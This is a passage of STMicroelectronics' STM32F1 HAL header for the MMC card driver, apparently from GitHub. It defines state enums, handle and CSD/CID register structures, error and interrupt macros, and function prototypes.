}
}
}
| {
"pile_set_name": "Github"
} |
/**
******************************************************************************
* @file stm32f1xx_hal_mmc.h
* @author MCD Application Team
* @brief Header file of MMC HAL module.
******************************************************************************
* @attention
*
* <h2><center>© COPYRIGHT(c) 2017 STMicroelectronics</center></h2>
*
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
* 1. Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* 3. Neither the name of STMicroelectronics nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
******************************************************************************
*/
/* Define to prevent recursive inclusion -------------------------------------*/
#ifndef __STM32F1xx_HAL_MMC_H
#define __STM32F1xx_HAL_MMC_H
#ifdef __cplusplus
extern "C" {
#endif
#if defined(STM32F103xE) || defined(STM32F103xG)
/* Includes ------------------------------------------------------------------*/
#include "stm32f1xx_ll_sdmmc.h"
/** @addtogroup STM32F1xx_HAL_Driver
* @{
*/
/** @defgroup MMC MMC
* @brief MMC HAL module driver
* @{
*/
/* Exported types ------------------------------------------------------------*/
/** @defgroup MMC_Exported_Types MMC Exported Types
* @{
*/
/** @defgroup MMC_Exported_Types_Group1 MMC State enumeration structure
* @{
*/
typedef enum
{
HAL_MMC_STATE_RESET = 0x00000000U, /*!< MMC not yet initialized or disabled */
HAL_MMC_STATE_READY = 0x00000001U, /*!< MMC initialized and ready for use */
HAL_MMC_STATE_TIMEOUT = 0x00000002U, /*!< MMC Timeout state */
HAL_MMC_STATE_BUSY = 0x00000003U, /*!< MMC process ongoing */
HAL_MMC_STATE_PROGRAMMING = 0x00000004U, /*!< MMC Programming State */
HAL_MMC_STATE_RECEIVING = 0x00000005U, /*!< MMC Receinving State */
HAL_MMC_STATE_TRANSFER = 0x00000006U, /*!< MMC Transfert State */
HAL_MMC_STATE_ERROR = 0x0000000FU /*!< MMC is in error state */
}HAL_MMC_StateTypeDef;
/**
* @}
*/
/** @defgroup MMC_Exported_Types_Group2 MMC Card State enumeration structure
* @{
*/
typedef enum
{
HAL_MMC_CARD_READY = 0x00000001U, /*!< Card state is ready */
HAL_MMC_CARD_IDENTIFICATION = 0x00000002U, /*!< Card is in identification state */
HAL_MMC_CARD_STANDBY = 0x00000003U, /*!< Card is in standby state */
HAL_MMC_CARD_TRANSFER = 0x00000004U, /*!< Card is in transfer state */
HAL_MMC_CARD_SENDING = 0x00000005U, /*!< Card is sending an operation */
HAL_MMC_CARD_RECEIVING = 0x00000006U, /*!< Card is receiving operation information */
HAL_MMC_CARD_PROGRAMMING = 0x00000007U, /*!< Card is in programming state */
HAL_MMC_CARD_DISCONNECTED = 0x00000008U, /*!< Card is disconnected */
HAL_MMC_CARD_ERROR = 0x000000FFU /*!< Card response Error */
}HAL_MMC_CardStateTypeDef;
/**
* @}
*/
/** @defgroup MMC_Exported_Types_Group3 MMC Handle Structure definition
* @{
*/
#define MMC_InitTypeDef SDIO_InitTypeDef
#define MMC_TypeDef SDIO_TypeDef
/**
* @brief MMC Card Information Structure definition
*/
typedef struct
{
uint32_t CardType; /*!< Specifies the card Type */
uint32_t Class; /*!< Specifies the class of the card class */
uint32_t RelCardAdd; /*!< Specifies the Relative Card Address */
uint32_t BlockNbr; /*!< Specifies the Card Capacity in blocks */
uint32_t BlockSize; /*!< Specifies one block size in bytes */
uint32_t LogBlockNbr; /*!< Specifies the Card logical Capacity in blocks */
uint32_t LogBlockSize; /*!< Specifies logical block size in bytes */
}HAL_MMC_CardInfoTypeDef;
/**
* @brief MMC handle Structure definition
*/
typedef struct
{
MMC_TypeDef *Instance; /*!< MMC registers base address */
MMC_InitTypeDef Init; /*!< MMC required parameters */
HAL_LockTypeDef Lock; /*!< MMC locking object */
uint32_t *pTxBuffPtr; /*!< Pointer to MMC Tx transfer Buffer */
uint32_t TxXferSize; /*!< MMC Tx Transfer size */
uint32_t *pRxBuffPtr; /*!< Pointer to MMC Rx transfer Buffer */
uint32_t RxXferSize; /*!< MMC Rx Transfer size */
__IO uint32_t Context; /*!< MMC transfer context */
__IO HAL_MMC_StateTypeDef State; /*!< MMC card State */
__IO uint32_t ErrorCode; /*!< MMC Card Error codes */
DMA_HandleTypeDef *hdmarx; /*!< MMC Rx DMA handle parameters */
DMA_HandleTypeDef *hdmatx; /*!< MMC Tx DMA handle parameters */
HAL_MMC_CardInfoTypeDef MmcCard; /*!< MMC Card information */
uint32_t CSD[4U]; /*!< MMC card specific data table */
uint32_t CID[4U]; /*!< MMC card identification number table */
}MMC_HandleTypeDef;
/**
* @}
*/
/** @defgroup MMC_Exported_Types_Group4 Card Specific Data: CSD Register
* @{
*/
typedef struct
{
__IO uint8_t CSDStruct; /*!< CSD structure */
__IO uint8_t SysSpecVersion; /*!< System specification version */
__IO uint8_t Reserved1; /*!< Reserved */
__IO uint8_t TAAC; /*!< Data read access time 1 */
__IO uint8_t NSAC; /*!< Data read access time 2 in CLK cycles */
__IO uint8_t MaxBusClkFrec; /*!< Max. bus clock frequency */
__IO uint16_t CardComdClasses; /*!< Card command classes */
__IO uint8_t RdBlockLen; /*!< Max. read data block length */
__IO uint8_t PartBlockRead; /*!< Partial blocks for read allowed */
__IO uint8_t WrBlockMisalign; /*!< Write block misalignment */
__IO uint8_t RdBlockMisalign; /*!< Read block misalignment */
__IO uint8_t DSRImpl; /*!< DSR implemented */
__IO uint8_t Reserved2; /*!< Reserved */
__IO uint32_t DeviceSize; /*!< Device Size */
__IO uint8_t MaxRdCurrentVDDMin; /*!< Max. read current @ VDD min */
__IO uint8_t MaxRdCurrentVDDMax; /*!< Max. read current @ VDD max */
__IO uint8_t MaxWrCurrentVDDMin; /*!< Max. write current @ VDD min */
__IO uint8_t MaxWrCurrentVDDMax; /*!< Max. write current @ VDD max */
__IO uint8_t DeviceSizeMul; /*!< Device size multiplier */
__IO uint8_t EraseGrSize; /*!< Erase group size */
__IO uint8_t EraseGrMul; /*!< Erase group size multiplier */
__IO uint8_t WrProtectGrSize; /*!< Write protect group size */
__IO uint8_t WrProtectGrEnable; /*!< Write protect group enable */
__IO uint8_t ManDeflECC; /*!< Manufacturer default ECC */
__IO uint8_t WrSpeedFact; /*!< Write speed factor */
__IO uint8_t MaxWrBlockLen; /*!< Max. write data block length */
__IO uint8_t WriteBlockPaPartial; /*!< Partial blocks for write allowed */
__IO uint8_t Reserved3; /*!< Reserved */
__IO uint8_t ContentProtectAppli; /*!< Content protection application */
__IO uint8_t FileFormatGrouop; /*!< File format group */
__IO uint8_t CopyFlag; /*!< Copy flag (OTP) */
__IO uint8_t PermWrProtect; /*!< Permanent write protection */
__IO uint8_t TempWrProtect; /*!< Temporary write protection */
__IO uint8_t FileFormat; /*!< File format */
__IO uint8_t ECC; /*!< ECC code */
__IO uint8_t CSD_CRC; /*!< CSD CRC */
__IO uint8_t Reserved4; /*!< Always 1 */
}HAL_MMC_CardCSDTypeDef;
/**
* @}
*/
/** @defgroup MMC_Exported_Types_Group5 Card Identification Data: CID Register
* @{
*/
typedef struct
{
__IO uint8_t ManufacturerID; /*!< Manufacturer ID */
__IO uint16_t OEM_AppliID; /*!< OEM/Application ID */
__IO uint32_t ProdName1; /*!< Product Name part1 */
__IO uint8_t ProdName2; /*!< Product Name part2 */
__IO uint8_t ProdRev; /*!< Product Revision */
__IO uint32_t ProdSN; /*!< Product Serial Number */
__IO uint8_t Reserved1; /*!< Reserved1 */
__IO uint16_t ManufactDate; /*!< Manufacturing Date */
__IO uint8_t CID_CRC; /*!< CID CRC */
__IO uint8_t Reserved2; /*!< Always 1 */
}HAL_MMC_CardCIDTypeDef;
/**
* @}
*/
/** @defgroup MMC_Exported_Types_Group6 MMC Card Status returned by ACMD13
* @{
*/
typedef struct
{
__IO uint8_t DataBusWidth; /*!< Shows the currently defined data bus width */
__IO uint8_t SecuredMode; /*!< Card is in secured mode of operation */
__IO uint16_t CardType; /*!< Carries information about card type */
__IO uint32_t ProtectedAreaSize; /*!< Carries information about the capacity of protected area */
__IO uint8_t SpeedClass; /*!< Carries information about the speed class of the card */
__IO uint8_t PerformanceMove; /*!< Carries information about the card's performance move */
__IO uint8_t AllocationUnitSize; /*!< Carries information about the card's allocation unit size */
__IO uint16_t EraseSize; /*!< Determines the number of AUs to be erased in one operation */
__IO uint8_t EraseTimeout; /*!< Determines the timeout for any number of AU erase */
__IO uint8_t EraseOffset; /*!< Carries information about the erase offset */
}HAL_MMC_CardStatusTypeDef;
/**
* @}
*/
/**
* @}
*/
/* Exported constants --------------------------------------------------------*/
/** @defgroup MMC_Exported_Constants Exported Constants
* @{
*/
#define BLOCKSIZE 512U /*!< Block size is 512 bytes */
#define CAPACITY 0x400000U /*!< Log Block Nuumber for 2 G bytes Cards */
/** @defgroup MMC_Exported_Constansts_Group1 MMC Error status enumeration Structure definition
* @{
*/
#define HAL_MMC_ERROR_NONE SDMMC_ERROR_NONE /*!< No error */
#define HAL_MMC_ERROR_CMD_CRC_FAIL SDMMC_ERROR_CMD_CRC_FAIL /*!< Command response received (but CRC check failed) */
#define HAL_MMC_ERROR_DATA_CRC_FAIL SDMMC_ERROR_DATA_CRC_FAIL /*!< Data block sent/received (CRC check failed) */
#define HAL_MMC_ERROR_CMD_RSP_TIMEOUT SDMMC_ERROR_CMD_RSP_TIMEOUT /*!< Command response timeout */
#define HAL_MMC_ERROR_DATA_TIMEOUT SDMMC_ERROR_DATA_TIMEOUT /*!< Data timeout */
#define HAL_MMC_ERROR_TX_UNDERRUN SDMMC_ERROR_TX_UNDERRUN /*!< Transmit FIFO underrun */
#define HAL_MMC_ERROR_RX_OVERRUN SDMMC_ERROR_RX_OVERRUN /*!< Receive FIFO overrun */
#define HAL_MMC_ERROR_ADDR_MISALIGNED SDMMC_ERROR_ADDR_MISALIGNED /*!< Misaligned address */
#define HAL_MMC_ERROR_BLOCK_LEN_ERR SDMMC_ERROR_BLOCK_LEN_ERR /*!< Transferred block length is not allowed for the card or the
number of transferred bytes does not match the block length */
#define HAL_MMC_ERROR_ERASE_SEQ_ERR SDMMC_ERROR_ERASE_SEQ_ERR /*!< An error in the sequence of erase command occurs */
#define HAL_MMC_ERROR_BAD_ERASE_PARAM SDMMC_ERROR_BAD_ERASE_PARAM /*!< An invalid selection for erase groups */
#define HAL_MMC_ERROR_WRITE_PROT_VIOLATION SDMMC_ERROR_WRITE_PROT_VIOLATION /*!< Attempt to program a write protect block */
#define HAL_MMC_ERROR_LOCK_UNLOCK_FAILED SDMMC_ERROR_LOCK_UNLOCK_FAILED /*!< Sequence or password error has been detected in unlock
command or if there was an attempt to access a locked card */
#define HAL_MMC_ERROR_COM_CRC_FAILED SDMMC_ERROR_COM_CRC_FAILED /*!< CRC check of the previous command failed */
#define HAL_MMC_ERROR_ILLEGAL_CMD SDMMC_ERROR_ILLEGAL_CMD /*!< Command is not legal for the card state */
#define HAL_MMC_ERROR_CARD_ECC_FAILED SDMMC_ERROR_CARD_ECC_FAILED /*!< Card internal ECC was applied but failed to correct the data */
#define HAL_MMC_ERROR_CC_ERR SDMMC_ERROR_CC_ERR /*!< Internal card controller error */
#define HAL_MMC_ERROR_GENERAL_UNKNOWN_ERR SDMMC_ERROR_GENERAL_UNKNOWN_ERR /*!< General or unknown error */
#define HAL_MMC_ERROR_STREAM_READ_UNDERRUN SDMMC_ERROR_STREAM_READ_UNDERRUN /*!< The card could not sustain data reading in stream rmode */
#define HAL_MMC_ERROR_STREAM_WRITE_OVERRUN SDMMC_ERROR_STREAM_WRITE_OVERRUN /*!< The card could not sustain data programming in stream mode */
#define HAL_MMC_ERROR_CID_CSD_OVERWRITE SDMMC_ERROR_CID_CSD_OVERWRITE /*!< CID/CSD overwrite error */
#define HAL_MMC_ERROR_WP_ERASE_SKIP SDMMC_ERROR_WP_ERASE_SKIP /*!< Only partial address space was erased */
#define HAL_MMC_ERROR_CARD_ECC_DISABLED SDMMC_ERROR_CARD_ECC_DISABLED /*!< Command has been executed without using internal ECC */
#define HAL_MMC_ERROR_ERASE_RESET SDMMC_ERROR_ERASE_RESET /*!< Erase sequence was cleared before executing because an out
of erase sequence command was received */
#define HAL_MMC_ERROR_AKE_SEQ_ERR SDMMC_ERROR_AKE_SEQ_ERR /*!< Error in sequence of authentication */
#define HAL_MMC_ERROR_INVALID_VOLTRANGE SDMMC_ERROR_INVALID_VOLTRANGE /*!< Error in case of invalid voltage range */
#define HAL_MMC_ERROR_ADDR_OUT_OF_RANGE SDMMC_ERROR_ADDR_OUT_OF_RANGE /*!< Error when addressed block is out of range */
#define HAL_MMC_ERROR_REQUEST_NOT_APPLICABLE SDMMC_ERROR_REQUEST_NOT_APPLICABLE /*!< Error when command request is not applicable */
#define HAL_MMC_ERROR_PARAM SDMMC_ERROR_INVALID_PARAMETER /*!< the used parameter is not valid */
#define HAL_MMC_ERROR_UNSUPPORTED_FEATURE SDMMC_ERROR_UNSUPPORTED_FEATURE /*!< Error when feature is not insupported */
#define HAL_MMC_ERROR_BUSY SDMMC_ERROR_BUSY /*!< Error when transfer process is busy */
#define HAL_MMC_ERROR_DMA SDMMC_ERROR_DMA /*!< Error while DMA transfer */
#define HAL_MMC_ERROR_TIMEOUT SDMMC_ERROR_TIMEOUT /*!< Timeout error */
/**
* @}
*/
/** @defgroup MMC_Exported_Constansts_Group2 MMC context enumeration structure
* @{
*/
#define MMC_CONTEXT_NONE 0x00000000U /*!< None */
#define MMC_CONTEXT_READ_SINGLE_BLOCK 0x00000001U /*!< Read single block operation */
#define MMC_CONTEXT_READ_MULTIPLE_BLOCK 0x00000002U /*!< Read multiple blocks operation */
#define MMC_CONTEXT_WRITE_SINGLE_BLOCK 0x00000010U /*!< Write single block operation */
#define MMC_CONTEXT_WRITE_MULTIPLE_BLOCK 0x00000020U /*!< Write multiple blocks operation */
#define MMC_CONTEXT_IT 0x00000008U /*!< Process in Interrupt mode */
#define MMC_CONTEXT_DMA 0x00000080U /*!< Process in DMA mode */
/**
* @}
*/
/** @defgroup MMC_Exported_Constansts_Group3 MMC Voltage mode
* @{
*/
/**
* @brief
*/
#define MMC_HIGH_VOLTAGE_RANGE 0x80FF8000U /*!< VALUE OF ARGUMENT */
#define MMC_DUAL_VOLTAGE_RANGE 0x80FF8080U /*!< VALUE OF ARGUMENT */
#define eMMC_HIGH_VOLTAGE_RANGE 0xC0FF8000U /*!< for eMMC > 2Gb sector mode */
#define eMMC_DUAL_VOLTAGE_RANGE 0xC0FF8080U /*!< for eMMC > 2Gb sector mode */
#define MMC_INVALID_VOLTAGE_RANGE 0x0001FF01U
/**
* @}
*/
/** @defgroup MMC_Exported_Constansts_Group4 MMC Memory Cards
* @{
*/
#define MMC_HIGH_VOLTAGE_CARD 0x00000000U
#define MMC_DUAL_VOLTAGE_CARD 0x00000001U
/**
* @}
*/
/**
* @}
*/
/* Exported macro ------------------------------------------------------------*/
/** @defgroup MMC_Exported_macros MMC Exported Macros
* @brief macros to handle interrupts and specific clock configurations
* @{
*/
/**
* @brief Enable the MMC device.
* @retval None
*/
#define __HAL_MMC_ENABLE(__HANDLE__) __SDIO_ENABLE((__HANDLE__)->Instance)
/**
* @brief Disable the MMC device.
* @retval None
*/
#define __HAL_MMC_DISABLE(__HANDLE__) __SDIO_DISABLE((__HANDLE__)->Instance)
/**
* @brief Enable the SDMMC DMA transfer.
* @retval None
*/
#define __HAL_MMC_DMA_ENABLE(__HANDLE__) __SDIO_DMA_ENABLE((__HANDLE__)->Instance)
/**
* @brief Disable the SDMMC DMA transfer.
* @retval None
*/
#define __HAL_MMC_DMA_DISABLE(__HANDLE__) __SDIO_DMA_DISABLE((__HANDLE__)->Instance)
/**
* @brief Enable the MMC device interrupt.
* @param __HANDLE__: MMC Handle
* @param __INTERRUPT__: specifies the SDMMC interrupt sources to be enabled.
* This parameter can be one or a combination of the following values:
* @arg SDIO_IT_CCRCFAIL: Command response received (CRC check failed) interrupt
* @arg SDIO_IT_DCRCFAIL: Data block sent/received (CRC check failed) interrupt
* @arg SDIO_IT_CTIMEOUT: Command response timeout interrupt
* @arg SDIO_IT_DTIMEOUT: Data timeout interrupt
* @arg SDIO_IT_TXUNDERR: Transmit FIFO underrun error interrupt
* @arg SDIO_IT_RXOVERR: Received FIFO overrun error interrupt
* @arg SDIO_IT_CMDREND: Command response received (CRC check passed) interrupt
* @arg SDIO_IT_CMDSENT: Command sent (no response required) interrupt
* @arg SDIO_IT_DATAEND: Data end (data counter, SDIDCOUNT, is zero) interrupt
* @arg SDIO_IT_DBCKEND: Data block sent/received (CRC check passed) interrupt
* @arg SDIO_IT_CMDACT: Command transfer in progress interrupt
* @arg SDIO_IT_TXACT: Data transmit in progress interrupt
* @arg SDIO_IT_RXACT: Data receive in progress interrupt
* @arg SDIO_IT_TXFIFOHE: Transmit FIFO Half Empty interrupt
* @arg SDIO_IT_RXFIFOHF: Receive FIFO Half Full interrupt
* @arg SDIO_IT_TXFIFOF: Transmit FIFO full interrupt
* @arg SDIO_IT_RXFIFOF: Receive FIFO full interrupt
* @arg SDIO_IT_TXFIFOE: Transmit FIFO empty interrupt
* @arg SDIO_IT_RXFIFOE: Receive FIFO empty interrupt
* @arg SDIO_IT_TXDAVL: Data available in transmit FIFO interrupt
* @arg SDIO_IT_RXDAVL: Data available in receive FIFO interrupt
* @arg SDIO_IT_SDIOIT: SD I/O interrupt received interrupt
* @retval None
*/
#define __HAL_MMC_ENABLE_IT(__HANDLE__, __INTERRUPT__) __SDIO_ENABLE_IT((__HANDLE__)->Instance, (__INTERRUPT__))
/**
* @brief Disable the MMC device interrupt.
* @param __HANDLE__: MMC Handle
* @param __INTERRUPT__: specifies the SDMMC interrupt sources to be disabled.
* This parameter can be one or a combination of the following values:
* @arg SDIO_IT_CCRCFAIL: Command response received (CRC check failed) interrupt
* @arg SDIO_IT_DCRCFAIL: Data block sent/received (CRC check failed) interrupt
* @arg SDIO_IT_CTIMEOUT: Command response timeout interrupt
* @arg SDIO_IT_DTIMEOUT: Data timeout interrupt
* @arg SDIO_IT_TXUNDERR: Transmit FIFO underrun error interrupt
* @arg SDIO_IT_RXOVERR: Received FIFO overrun error interrupt
* @arg SDIO_IT_CMDREND: Command response received (CRC check passed) interrupt
* @arg SDIO_IT_CMDSENT: Command sent (no response required) interrupt
* @arg SDIO_IT_DATAEND: Data end (data counter, SDIDCOUNT, is zero) interrupt
* @arg SDIO_IT_DBCKEND: Data block sent/received (CRC check passed) interrupt
* @arg SDIO_IT_CMDACT: Command transfer in progress interrupt
* @arg SDIO_IT_TXACT: Data transmit in progress interrupt
* @arg SDIO_IT_RXACT: Data receive in progress interrupt
* @arg SDIO_IT_TXFIFOHE: Transmit FIFO Half Empty interrupt
* @arg SDIO_IT_RXFIFOHF: Receive FIFO Half Full interrupt
* @arg SDIO_IT_TXFIFOF: Transmit FIFO full interrupt
* @arg SDIO_IT_RXFIFOF: Receive FIFO full interrupt
* @arg SDIO_IT_TXFIFOE: Transmit FIFO empty interrupt
* @arg SDIO_IT_RXFIFOE: Receive FIFO empty interrupt
* @arg SDIO_IT_TXDAVL: Data available in transmit FIFO interrupt
* @arg SDIO_IT_RXDAVL: Data available in receive FIFO interrupt
* @arg SDIO_IT_SDIOIT: SD I/O interrupt received interrupt
* @retval None
*/
#define __HAL_MMC_DISABLE_IT(__HANDLE__, __INTERRUPT__) __SDIO_DISABLE_IT((__HANDLE__)->Instance, (__INTERRUPT__))
/**
* @brief Check whether the specified MMC flag is set or not.
* @param __HANDLE__: MMC Handle
* @param __FLAG__: specifies the flag to check.
* This parameter can be one of the following values:
* @arg SDIO_FLAG_CCRCFAIL: Command response received (CRC check failed)
* @arg SDIO_FLAG_DCRCFAIL: Data block sent/received (CRC check failed)
* @arg SDIO_FLAG_CTIMEOUT: Command response timeout
* @arg SDIO_FLAG_DTIMEOUT: Data timeout
* @arg SDIO_FLAG_TXUNDERR: Transmit FIFO underrun error
* @arg SDIO_FLAG_RXOVERR: Received FIFO overrun error
* @arg SDIO_FLAG_CMDREND: Command response received (CRC check passed)
* @arg SDIO_FLAG_CMDSENT: Command sent (no response required)
* @arg SDIO_FLAG_DATAEND: Data end (data counter, SDIDCOUNT, is zero)
* @arg SDIO_FLAG_DBCKEND: Data block sent/received (CRC check passed)
* @arg SDIO_FLAG_CMDACT: Command transfer in progress
* @arg SDIO_FLAG_TXACT: Data transmit in progress
* @arg SDIO_FLAG_RXACT: Data receive in progress
* @arg SDIO_FLAG_TXFIFOHE: Transmit FIFO Half Empty
* @arg SDIO_FLAG_RXFIFOHF: Receive FIFO Half Full
* @arg SDIO_FLAG_TXFIFOF: Transmit FIFO full
* @arg SDIO_FLAG_RXFIFOF: Receive FIFO full
* @arg SDIO_FLAG_TXFIFOE: Transmit FIFO empty
* @arg SDIO_FLAG_RXFIFOE: Receive FIFO empty
* @arg SDIO_FLAG_TXDAVL: Data available in transmit FIFO
* @arg SDIO_FLAG_RXDAVL: Data available in receive FIFO
* @arg SDIO_FLAG_SDIOIT: SD I/O interrupt received
* @retval The new state of MMC FLAG (SET or RESET).
*/
#define __HAL_MMC_GET_FLAG(__HANDLE__, __FLAG__) __SDIO_GET_FLAG((__HANDLE__)->Instance, (__FLAG__))
/**
* @brief Clear the MMC's pending flags.
* @param __HANDLE__: MMC Handle
* @param __FLAG__: specifies the flag to clear.
* This parameter can be one or a combination of the following values:
* @arg SDIO_FLAG_CCRCFAIL: Command response received (CRC check failed)
* @arg SDIO_FLAG_DCRCFAIL: Data block sent/received (CRC check failed)
* @arg SDIO_FLAG_CTIMEOUT: Command response timeout
* @arg SDIO_FLAG_DTIMEOUT: Data timeout
* @arg SDIO_FLAG_TXUNDERR: Transmit FIFO underrun error
* @arg SDIO_FLAG_RXOVERR: Received FIFO overrun error
* @arg SDIO_FLAG_CMDREND: Command response received (CRC check passed)
* @arg SDIO_FLAG_CMDSENT: Command sent (no response required)
* @arg SDIO_FLAG_DATAEND: Data end (data counter, SDIDCOUNT, is zero)
* @arg SDIO_FLAG_DBCKEND: Data block sent/received (CRC check passed)
* @arg SDIO_FLAG_SDIOIT: SD I/O interrupt received
* @retval None
*/
#define __HAL_MMC_CLEAR_FLAG(__HANDLE__, __FLAG__) __SDIO_CLEAR_FLAG((__HANDLE__)->Instance, (__FLAG__))
/**
* @brief Check whether the specified MMC interrupt has occurred or not.
* @param __HANDLE__: MMC Handle
* @param __INTERRUPT__: specifies the SDMMC interrupt source to check.
* This parameter can be one of the following values:
* @arg SDIO_IT_CCRCFAIL: Command response received (CRC check failed) interrupt
* @arg SDIO_IT_DCRCFAIL: Data block sent/received (CRC check failed) interrupt
* @arg SDIO_IT_CTIMEOUT: Command response timeout interrupt
* @arg SDIO_IT_DTIMEOUT: Data timeout interrupt
* @arg SDIO_IT_TXUNDERR: Transmit FIFO underrun error interrupt
* @arg SDIO_IT_RXOVERR: Received FIFO overrun error interrupt
* @arg SDIO_IT_CMDREND: Command response received (CRC check passed) interrupt
* @arg SDIO_IT_CMDSENT: Command sent (no response required) interrupt
* @arg SDIO_IT_DATAEND: Data end (data counter, SDIDCOUNT, is zero) interrupt
* @arg SDIO_IT_DBCKEND: Data block sent/received (CRC check passed) interrupt
* @arg SDIO_IT_CMDACT: Command transfer in progress interrupt
* @arg SDIO_IT_TXACT: Data transmit in progress interrupt
* @arg SDIO_IT_RXACT: Data receive in progress interrupt
* @arg SDIO_IT_TXFIFOHE: Transmit FIFO Half Empty interrupt
* @arg SDIO_IT_RXFIFOHF: Receive FIFO Half Full interrupt
* @arg SDIO_IT_TXFIFOF: Transmit FIFO full interrupt
* @arg SDIO_IT_RXFIFOF: Receive FIFO full interrupt
* @arg SDIO_IT_TXFIFOE: Transmit FIFO empty interrupt
* @arg SDIO_IT_RXFIFOE: Receive FIFO empty interrupt
* @arg SDIO_IT_TXDAVL: Data available in transmit FIFO interrupt
* @arg SDIO_IT_RXDAVL: Data available in receive FIFO interrupt
* @arg SDIO_IT_SDIOIT: SD I/O interrupt received interrupt
* @retval The new state of MMC IT (SET or RESET).
*/
#define __HAL_MMC_GET_IT(__HANDLE__, __INTERRUPT__) __SDIO_GET_IT((__HANDLE__)->Instance, (__INTERRUPT__))
/**
* @brief Clear the MMC's interrupt pending bits.
* @param __HANDLE__: MMC Handle
* @param __INTERRUPT__: specifies the interrupt pending bit to clear.
* This parameter can be one or a combination of the following values:
* @arg SDIO_IT_CCRCFAIL: Command response received (CRC check failed) interrupt
* @arg SDIO_IT_DCRCFAIL: Data block sent/received (CRC check failed) interrupt
* @arg SDIO_IT_CTIMEOUT: Command response timeout interrupt
* @arg SDIO_IT_DTIMEOUT: Data timeout interrupt
* @arg SDIO_IT_TXUNDERR: Transmit FIFO underrun error interrupt
* @arg SDIO_IT_RXOVERR: Received FIFO overrun error interrupt
* @arg SDIO_IT_CMDREND: Command response received (CRC check passed) interrupt
* @arg SDIO_IT_CMDSENT: Command sent (no response required) interrupt
* @arg SDIO_IT_DATAEND: Data end (data counter, SDMMC_DCOUNT, is zero) interrupt
* @arg SDIO_IT_SDIOIT: SD I/O interrupt received interrupt
* @retval None
*/
#define __HAL_MMC_CLEAR_IT(__HANDLE__, __INTERRUPT__) __SDIO_CLEAR_IT((__HANDLE__)->Instance, (__INTERRUPT__))
/**
* @}
*/
/* Exported functions --------------------------------------------------------*/
/** @defgroup MMC_Exported_Functions MMC Exported Functions
* @{
*/
/** @defgroup MMC_Exported_Functions_Group1 Initialization and de-initialization functions
* @{
*/
HAL_StatusTypeDef HAL_MMC_Init(MMC_HandleTypeDef *hmmc);
HAL_StatusTypeDef HAL_MMC_InitCard(MMC_HandleTypeDef *hmmc);
HAL_StatusTypeDef HAL_MMC_DeInit (MMC_HandleTypeDef *hmmc);
void HAL_MMC_MspInit(MMC_HandleTypeDef *hmmc);
void HAL_MMC_MspDeInit(MMC_HandleTypeDef *hmmc);
/**
* @}
*/
/** @defgroup MMC_Exported_Functions_Group2 Input and Output operation functions
* @{
*/
/* Blocking mode: Polling */
HAL_StatusTypeDef HAL_MMC_ReadBlocks(MMC_HandleTypeDef *hmmc, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks, uint32_t Timeout);
HAL_StatusTypeDef HAL_MMC_WriteBlocks(MMC_HandleTypeDef *hmmc, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks, uint32_t Timeout);
HAL_StatusTypeDef HAL_MMC_Erase(MMC_HandleTypeDef *hmmc, uint32_t BlockStartAdd, uint32_t BlockEndAdd);
/* Non-Blocking mode: IT */
HAL_StatusTypeDef HAL_MMC_ReadBlocks_IT(MMC_HandleTypeDef *hmmc, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks);
HAL_StatusTypeDef HAL_MMC_WriteBlocks_IT(MMC_HandleTypeDef *hmmc, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks);
/* Non-Blocking mode: DMA */
HAL_StatusTypeDef HAL_MMC_ReadBlocks_DMA(MMC_HandleTypeDef *hmmc, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks);
HAL_StatusTypeDef HAL_MMC_WriteBlocks_DMA(MMC_HandleTypeDef *hmmc, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks);
void HAL_MMC_IRQHandler(MMC_HandleTypeDef *hmmc);
/* Callback in non blocking modes (DMA) */
void HAL_MMC_TxCpltCallback(MMC_HandleTypeDef *hmmc);
void HAL_MMC_RxCpltCallback(MMC_HandleTypeDef *hmmc);
void HAL_MMC_ErrorCallback(MMC_HandleTypeDef *hmmc);
void HAL_MMC_AbortCallback(MMC_HandleTypeDef *hmmc);
/**
* @}
*/
/** @defgroup MMC_Exported_Functions_Group3 Peripheral Control functions
* @{
*/
HAL_StatusTypeDef HAL_MMC_ConfigWideBusOperation(MMC_HandleTypeDef *hmmc, uint32_t WideMode);
/**
* @}
*/
/** @defgroup MMC_Exported_Functions_Group4 MMC card related functions
* @{
*/
HAL_MMC_CardStateTypeDef HAL_MMC_GetCardState(MMC_HandleTypeDef *hmmc);
HAL_StatusTypeDef HAL_MMC_GetCardCID(MMC_HandleTypeDef *hmmc, HAL_MMC_CardCIDTypeDef *pCID);
HAL_StatusTypeDef HAL_MMC_GetCardCSD(MMC_HandleTypeDef *hmmc, HAL_MMC_CardCSDTypeDef *pCSD);
HAL_StatusTypeDef HAL_MMC_GetCardInfo(MMC_HandleTypeDef *hmmc, HAL_MMC_CardInfoTypeDef *pCardInfo);
/**
* @}
*/
/** @defgroup MMC_Exported_Functions_Group5 Peripheral State and Errors functions
* @{
*/
